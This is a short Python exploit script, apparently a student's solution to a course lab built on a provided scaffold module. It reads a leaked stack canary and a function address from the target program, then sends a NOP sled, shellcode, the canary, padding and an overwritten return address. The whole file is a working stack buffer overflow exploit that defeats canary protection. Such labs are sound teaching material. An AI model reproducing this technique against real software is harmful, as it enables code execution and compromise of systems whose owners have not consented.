#!/usr/bin/env python3

import scaffold as p
from scaffold import SHELLCODE
import sys

# Configure Python to print text strings like byte strings. Don't remove this!
sys.stdout.reconfigure(encoding='latin1')

### HELPER FUNCTIONS ###

def int_to_bytes(x: int) -> str:
    return x.to_bytes((x.bit_length() + 7) // 8, 'little').decode('latin1')

### YOUR CODE STARTS HERE ###
sc_len = len(SHELLCODE)

# Program start:
p.start()

checks = [p.recvline() for _ in range(4)]
canary_str = checks[1].split(' ')[-1][:-1]
canary = int(canary_str, 16)
canary_bs = canary.to_bytes(4, "little")
canary_bstr = int_to_bytes(canary)
# print(f"canary = {repr(canary_str)} ~> {repr(canary_bs)} ~> \'", 
#     end=''.join(f'\\x{ord(c):02x}' for c in canary_bstr) + '\'\n')

pfaddr_str = checks[2].split(' ')[-1][:-1]
pfaddr = int(pfaddr_str, 16)
pfreta = pfaddr + 41
pfaddr_bstr = int_to_bytes(pfaddr)
pfreta_bstr = int_to_bytes(pfreta)

# Example send:
# p.send(SHELLCODE)
# p.send(''.join([chr(0x78-0x22*(i%4)) for i in range(255-sc_len)]))
p.send(chr(0x90)*(255-sc_len))
p.send(SHELLCODE)
p.send(':')
p.send(canary_bstr)
p.send('::::'*3)
p.send(pfreta_bstr)
# p.send(SHELLCODE)
p.send('\n')


# print("mitigations: ")
# [print('\t'+repr(c)) for c in checks]

# Example receive:
# assert p.recv(5) == 'test\n'

# readout = p.recvline()
# print(f"got reply: {repr(readout)}")

### YOUR CODE ENDS HERE ###
